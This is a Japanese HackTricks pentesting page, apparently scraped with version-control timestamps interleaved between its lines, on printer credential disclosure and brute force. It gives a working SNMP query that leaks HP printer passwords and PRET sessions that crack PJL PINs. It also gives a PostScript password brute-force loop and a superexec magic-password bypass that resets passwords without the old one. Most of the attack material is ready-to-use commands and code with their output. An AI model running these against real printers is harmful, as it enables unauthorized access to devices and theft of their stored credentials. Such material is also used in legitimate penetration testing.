2023-07-07 23:42:27 +00:00
|
|
|
|
# 認証情報の漏洩 / ブルートフォース
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
2023-04-25 18:35:28 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。**
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
プリンターは、**デフォルトのパスワードまたは初期パスワードが設定されていない**場合があります。いずれの場合でも、エンドユーザーまたは管理者はデバイスを保護するためにアクティブにパスワードを設定する必要があります。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
## パスワードの漏洩
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2022-05-01 13:25:53 +00:00
|
|
|
|
### SNMP
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
古いHPプリンターには、パスワードを返す脆弱なOIDがありました。他のベンダーでも同様のSNMPベースの問題が発生する可能性があります。
|
2021-10-18 11:21:18 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0
|
|
|
|
|
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 …
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
### パスバック
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
もしプリンタが外部のLDAPを使用してユーザーを認証している場合、この設定を変更する権限がある場合(おそらくWebコンソールインターフェースを使用して)、プリンタをあなたのLDAPサーバに接続させ、任意のユーザーを認証することができます。\
|
|
|
|
|
ただし、この設定を悪用して、プリンタがLDAPサーバに接続するために使用している資格情報を盗むこともできます。[詳細はこちらを参照してください](../../windows-hardening/active-directory-methodology/ad-information-in-printers.md)。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
## ブルートフォース
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2022-05-01 13:25:53 +00:00
|
|
|
|
### PJL
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
PJLパスワードは16ビットのキーサイズが制限されているため、ブルートフォース攻撃の脆弱性があります。30分以内に正しいパスワードを推測することができます。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
ブルートフォースをテストするために、[PRET](https://github.com/RUB-NDS/PRET)の`lock`と`unlock`コマンドを使用することができます。
|
2021-10-18 11:21:18 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
./pret.py -q printer pjl
|
|
|
|
|
Connection to printer established
|
|
|
|
|
|
|
|
|
|
Welcome to the pret shell. Type help or ? to list commands.
|
|
|
|
|
printer:/> lock 999
|
|
|
|
|
PIN protection: ENABLED
|
|
|
|
|
Panel lock: ON
|
|
|
|
|
Disk lock: ON
|
|
|
|
|
printer:/> unlock
|
|
|
|
|
No PIN given, cracking.
|
|
|
|
|
PIN protection: DISABLED
|
|
|
|
|
Panel lock: OFF
|
|
|
|
|
Disk lock: OFF
|
|
|
|
|
```
|
2022-05-01 13:25:53 +00:00
|
|
|
|
### PostScript
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
PostScriptには2種類のパスワードがあります。`SystemParamsPassword`は用紙サイズなどの印刷ジョブの設定を変更するために使用されます。一方、`StartJobPassword`はサーバーループを終了し、PostScript環境を永久的に変更するために必要です。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
PostScriptパスワードに対するブルートフォース攻撃は非常に高速に実行することができます。なぜなら、**PostScriptインタプリタは自らを解読するようにプログラムすることができる**からです。
|
2021-10-18 11:21:18 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
/min 0 def /max 1000000 def
|
|
|
|
|
statusdict begin {
|
2023-07-07 23:42:27 +00:00
|
|
|
|
min 1 max
|
|
|
|
|
{dup checkpassword {== flush stop} {pop} ifelse} for
|
2020-07-15 15:43:14 +00:00
|
|
|
|
} stopped pop
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
別のアプローチは、Adobeの独自の`superexec`オペレータを使用して、PostScriptパスワードを**バイパス**することです。このオペレータは、`internaldict`辞書に存在し、静的なマジックパスワード(`1183615869`)によって「保護」されています。PostScriptコードをsuperexecにラップすることで、攻撃者は通常は無効なアクセスエラーが発生する言語のさまざまな保護メカニズムを無視することができます。以下に示すように、現在のパスワードを最初に送信せずにPostScriptパスワードを設定するために使用することができます:
|
2021-10-18 11:21:18 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
{ << /SystemParamsPassword (0)
|
2023-07-07 23:42:27 +00:00
|
|
|
|
/StartJobPassword (0) >> setsystemparams
|
2020-07-15 15:43:14 +00:00
|
|
|
|
} 1183615869 internaldict /superexec get exec
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
[PRET](https://github.com/RUB-NDS/PRET)のロックとアンロックのコマンドは、数値(整数)のPostScriptパスワードに対する**ブルートフォース**攻撃をテストするために使用することができます。また、**superexec magic**を使用してそれらを**バイパス**することもできます。
|
2021-10-18 11:21:18 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
./pret.py -q printer ps
|
|
|
|
|
Connection to printer established
|
|
|
|
|
|
|
|
|
|
Welcome to the pret shell. Type help or ? to list commands.
|
|
|
|
|
printer:/> lock 999
|
|
|
|
|
printer:/> unlock
|
|
|
|
|
No password given, cracking.
|
|
|
|
|
Device unlocked with password: 999
|
|
|
|
|
printer:/> lock S0me_Re4lly_g00d_Passw0rd!
|
|
|
|
|
printer:/> unlock bypass
|
|
|
|
|
Resetting password to zero with super-secret PostScript magic
|
|
|
|
|
Device unlocked with password: 0
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
**[http://hacking-printers.net/wiki/index.php/Credential_disclosure](http://hacking-printers.net/wiki/index.php/Credential_disclosure)**には、パスワードの漏洩とブルートフォースに関する詳細な情報があります。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
2023-04-25 18:35:28 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- **サイバーセキュリティ会社で働いていますか?** HackTricksで**会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|